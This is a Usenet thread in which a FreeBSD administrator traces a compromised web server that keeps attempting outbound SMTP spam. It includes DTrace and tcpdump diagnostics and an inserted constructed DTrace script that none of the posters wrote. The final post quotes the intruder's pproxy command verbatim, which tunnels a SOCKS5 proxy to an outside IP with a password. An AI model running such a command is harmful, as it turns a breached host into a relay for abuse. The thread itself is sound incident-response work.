• locating malware

    From Mike Scott@21:1/5 to All on Thu Feb 10 16:39:59 2022
    Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
    has been sending, and fortunately failing, to send junk mail to an MS
    machine, possibly a hotmail destination (certainly MS network). It's
    firewalled in now, but it was sending

    EHLO localhost
    MAIL FROM:<info@newretail.live>

    and then closing the connection.

    A full clamav scan is currently running but will take quite a few hours.


    So, given an unknown program that is occasionally trying to make an
    outbound link, can anyone suggest please how to find it?


    Thanks.


    --
    Mike Scott
    Harlow, England

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From John D Groenveld@21:1/5 to usenet.16@scottsonline.org.uk.inval on Thu Feb 10 19:58:03 2022
    In article <su3f50$tts$1@dont-email.me>,
    Mike Scott <usenet.16@scottsonline.org.uk.invalid> wrote:
    > So, given an unknown program that is occasionally trying to make an
    > outbound link, can anyone suggest please how to find it?

    Assuming you trust the host, Bad Idea[tm], you can run lsof on it: <URL:https://people.freebsd.org/~abe/> <URL:https://www.freshports.org/sysutils/lsof/>

    John
    groenveld@acm.org

  • From Matthias Meyser@21:1/5 to All on Thu Feb 10 22:14:28 2022
    On 10.02.2022 at 17:39 Mike Scott wrote:
    > Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
    > has been sending, and fortunately failing, to send junk mail to an MS
    > machine, possibly a hotmail destination (certainly MS network). It's
    > firewalled in now, but it was sending
    >
    > EHLO localhost
    > MAIL FROM:<info@newretail.live>

    fgrep -Ri newretail.live /



    --
    This e-mail was checked for viruses by Avast antivirus software. https://www.avast.com/antivirus

  • From Gerhard Strangar@21:1/5 to Mike Scott on Fri Feb 11 06:39:12 2022
    Mike Scott wrote:

    > So, given an unknown program that is occasionally trying to make an
    > outbound link, can anyone suggest please how to find it?

    Not sure if this works on 11.4:
    kldload dtraceall
    dtrace -n 'syscall:freebsd:connect:entry {trace(execname)}'

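An added example, not posted by anyone in the thread, that extends Gerhard's one-liner into a DTrace script: it reports only connect(2) calls aimed at TCP port 25 and prints the pid, parent pid, uid and full argument string of the caller, which is what is needed to tie an outbound SMTP attempt back to a process such as the one running as www. It assumes FreeBSD's sockaddr layout (sa_len at byte 0, sa_family at byte 1, then port and IPv4 address for AF_INET) and that `kldload dtraceall` has been run first.

```d
#!/usr/sbin/dtrace -s
#pragma D option quiet

/*
 * Constructed example: log every connect(2) whose destination is TCP/25.
 * The sockaddr passed in arg1 is copied from user space and decoded by
 * hand from FreeBSD's layout, so no kernel header types are required:
 *   byte 0   sa_len
 *   byte 1   sa_family (2 == AF_INET)
 *   bytes 2-3 port, network byte order
 *   bytes 4-7 IPv4 address
 */
syscall::connect:entry
/arg2 >= 8/
{
    self->sa   = (uint8_t *)copyin(arg1, 8);
    self->fam  = self->sa[1];
    self->port = (self->sa[2] << 8) | self->sa[3];
}

/* Only AF_INET connections to port 25 are reported. */
syscall::connect:entry
/self->sa != NULL && self->fam == 2 && self->port == 25/
{
    printf("%Y pid=%d ppid=%d uid=%d exec=%s -> %d.%d.%d.%d:%d\n",
        walltimestamp, pid, ppid, uid, execname,
        self->sa[4], self->sa[5], self->sa[6], self->sa[7], self->port);
    /* Full command line: shows e.g. an interpreter started with -m pproxy */
    printf("    args: %s\n", curpsinfo->pr_psargs);
}

/* Release thread-local storage after every connect(2), matched or not. */
syscall::connect:entry
{
    self->sa = 0;
    self->fam = 0;
    self->port = 0;
}
```

Run it as `dtrace -s smtp-connect.d` and leave it in a screen session; the next outbound attempt shows up with the process, its parent, and its argument list, so `ps -p <ppid>` then identifies what spawned it.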
  • From Mike Scott@21:1/5 to Matthias Meyser on Wed Feb 16 14:57:38 2022
    On 10/02/2022 21:14, Matthias Meyser wrote:
    > On 10.02.2022 at 17:39 Mike Scott wrote:
    >> Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
    >> has been sending, and fortunately failing, to send junk mail to an MS
    >> machine, possibly a hotmail destination (certainly MS network). It's
    >> firewalled in now, but it was sending
    >>
    >> EHLO localhost
    >> MAIL FROM:<info@newretail.live>
    >
    > fgrep -Ri newretail.live /



    Thanks to all for the comments.

    Unfortunately (perhaps?) there haven't been any outbound attempts
    lately, which makes me very uncomfortable. I'm running this one: brute
    force, and assumes there's no encryption involved.

    But hopefully I'll soon have the system ported to a new and smaller box,
    this time using jails for outward-facing services. (An enterprise that's
    proven much harder than anticipated!)

    --
    Mike Scott
    Harlow, England

  • From Mike Scott@21:1/5 to All on Thu Feb 17 14:54:56 2022
    On 16/02/2022 14:57, Mike Scott wrote:
    ....



    After an absence of a few days, similar behaviour is back. Same
    destination IP, but zero-length packets with bad checksum:

    root@data:/var/tmp # script z tcpdump -nvvv -i pflog0 port 25 and src 192.168.0.1
    Script started, output file is z
    tcpdump: listening on pflog0, link-type PFLOG (OpenBSD pflog file),
    capture size 262144 bytes

    13:49:15.894711 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto
    TCP (6), length 60)
    192.168.0.1.16375 > 104.47.70.33.25: Flags [S], cksum 0x6f28
    (incorrect -> 0x69dc), seq 2905393045, win 65535, options [mss
    1460,nop,wscale 6,sackOK,TS val 799509169 ecr 0], length 0


    However, after shutting down the webserver, I found a couple of
    processes still running as www, one of which was

    ./python -m pproxy -l socks5+in://116.203.212.184:10246/@192.168.0.1,#pproxy:CKjBrJD3 (python3.6)


    and which seemed to be in a loop checking the remote end, static.184.212.203.116.clients.your-server.de.


    It looks as though the recent apache path bug opened up my server, and
    this was left around. Looks like a proxy mechanism, that's about to be
    kill -9'ed.

    Thanks all.


    Oh, BTW, it's unfortunate that 11.4 froze with the package repository
    stuck on the buggy version (path backtrack) of apache. I'd have hoped
    someone would put in just the one bug-fix update.



    --
    Mike Scott
    Harlow, England
